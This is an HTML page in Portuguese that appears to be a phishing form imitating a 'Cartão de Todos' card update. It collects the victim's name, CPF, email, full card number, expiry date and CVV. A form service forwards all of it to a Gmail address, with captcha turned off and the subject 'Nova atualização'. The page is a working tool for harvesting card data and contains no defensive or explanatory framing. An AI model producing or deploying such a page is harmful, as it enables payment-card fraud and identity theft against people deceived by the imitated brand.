<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      background-color: #32bd7c;
    }

    form {
      width: 100%;
      max-width: 600px;
      padding: 20px;
      background-color: #f4f7f4;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      border-radius: 8px;
    }

    label {
      display: block;
      margin-bottom: 8px;
    }

    input, textarea {
      width: 100%;
      padding: 8px;
      margin-bottom: 16px;
      box-sizing: border-box;
      border: 1px solid #ccc;
      border-radius: 4px;
    }

    button {
      display: flex;
      align-items: center;
      justify-content: center;
      background-color: #4caf50;
      color: #fff;
      padding: 10px;
      width: 100px;
      border: none;
      border-radius: 4px;
      cursor: pointer;
      font-size: 20px;
    }

    button:hover {
      background-color: #45a049;
    }

    /* Adicionando imagem responsiva */
    img {
      max-width: 100%;
      height: auto;
      display: block;
      margin: 20px 0;
    }

    /* Responsividade usando Media Queries */
    @media only screen and (max-width: 600px) {
      form {
        max-width: 100%;
      }
    }
  </style>
</head>
<body>

  <form action="https://formsubmit.co/cartaodetodosleste924@gmail.com" method="POST">
    
    <img src="./cdt.png" alt="Imagem de exemplo">

    <label for="name">Nome:</label>
    <input type="text" id="name" name="name" required>

    <label for="cpf">CPF:</label>
    <input type="text" id="cpf" name="cpf" placeholder="123.456.789-00" required>

    <label for="email">E-mail:</label>
    <input type="email" id="email" name="email" required>

    <label for="cardNumber">Numeração do Cartão:</label>
    <input type="text" id="cardNumber" name="cardNumber" placeholder="xxxx xxxx xxxx xxxx" required>

    <label for="cardName">Digite o Nome que está no seu Cartão:</label>
    <input type="text" id="cardName" name="cardName" required>

    <label for="cardExpiration">Validade do Seu Cartão:</label>
    <input type="text" id="cardExpiration" name="cardExpiration" placeholder="MM/AA" required>

    <label for="cvv">CVV:</label>
    <input type="text" id="cvv" name="cvv" placeholder="123" required>

    <button type="submit">Enviar</button>

    <input type="hidden" name="_subject" value="Nova atualização">
    <input type="text" name="_honey" style="display: none;">
    <input type="hidden" name="_captcha" value="false">
  </form>

</body>
</html>
